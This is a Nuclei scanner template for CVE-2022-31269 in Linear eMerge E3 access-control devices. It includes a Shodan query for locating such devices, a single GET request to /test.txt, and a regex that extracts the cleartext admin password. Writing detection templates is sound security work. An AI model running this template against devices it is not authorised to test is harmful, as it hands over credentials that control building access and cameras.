nuclei-templates/http/cves/2022/CVE-2022-31269.yaml

60 lines
2.0 KiB
YAML
Raw Normal View History

2022-08-11 05:26:52 +00:00
id: CVE-2022-31269
info:
name: Linear eMerge E3-Series - Information Disclosure
2022-08-11 05:26:52 +00:00
author: For3stCo1d
severity: high
description: |
Linear eMerge E3-Series devices are susceptible to information disclosure. Admin credentials are stored in clear text at the endpoint /test.txt in situations where the default admin credentials have been changed. An attacker can obtain admin credentials, access the admin dashboard, control building access and cameras, and access employee information.
2023-09-27 15:51:13 +00:00
impact: |
An attacker can exploit this vulnerability to gain sensitive information from the device.
2023-09-06 11:59:08 +00:00
remediation: |
Apply the latest firmware update provided by the vendor to fix the vulnerability.
2022-08-11 05:26:52 +00:00
reference:
- https://packetstormsecurity.com/files/167990/Nortek-Linear-eMerge-E3-Series-Credential-Disclosure.html
- https://www.nortekcontrol.com/access-control/
- https://eg.linkedin.com/in/omar-1-hashem
- https://nvd.nist.gov/vuln/detail/CVE-2022-31269
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:N
cvss-score: 8.2
cve-id: CVE-2022-31269
cwe-id: CWE-798
2023-10-14 11:27:55 +00:00
epss-score: 0.00174
epss-percentile: 0.54513
2023-09-06 11:59:08 +00:00
cpe: cpe:2.3:o:nortekcontrol:emerge_e3_firmware:*:*:*:*:*:*:*:*
2022-08-11 05:26:52 +00:00
metadata:
2023-06-04 08:13:42 +00:00
verified: true
2023-09-06 11:59:08 +00:00
max-request: 1
2023-07-11 19:49:27 +00:00
vendor: nortekcontrol
product: emerge_e3_firmware
2023-09-06 11:59:08 +00:00
shodan-query: http.title:"Linear eMerge"
2024-01-14 09:21:50 +00:00
tags: cve,cve2022,emerge,exposure,packetstorm,nortekcontrol
2022-08-11 05:26:52 +00:00
http:
2022-08-11 05:26:52 +00:00
- method: GET
path:
- "{{BaseURL}}/test.txt"
matchers-condition: and
matchers:
- type: word
words:
- "ID="
- "Password="
condition: and
- type: word
part: header
words:
- text/plain
- type: status
status:
- 200
extractors:
- type: regex
regex:
- Password='(.+?)'
# digest: 4a0a004730450221008385d0a97cd0523e90dc9af6f7fab28159e79f1ab275e2068a490ff5c9913db20220074b21a8927e91c6be25ff14fb567e2f828997ecfb4eb97e6c0f0d61269949c9:922c64590222798bb761d5b6d8e72950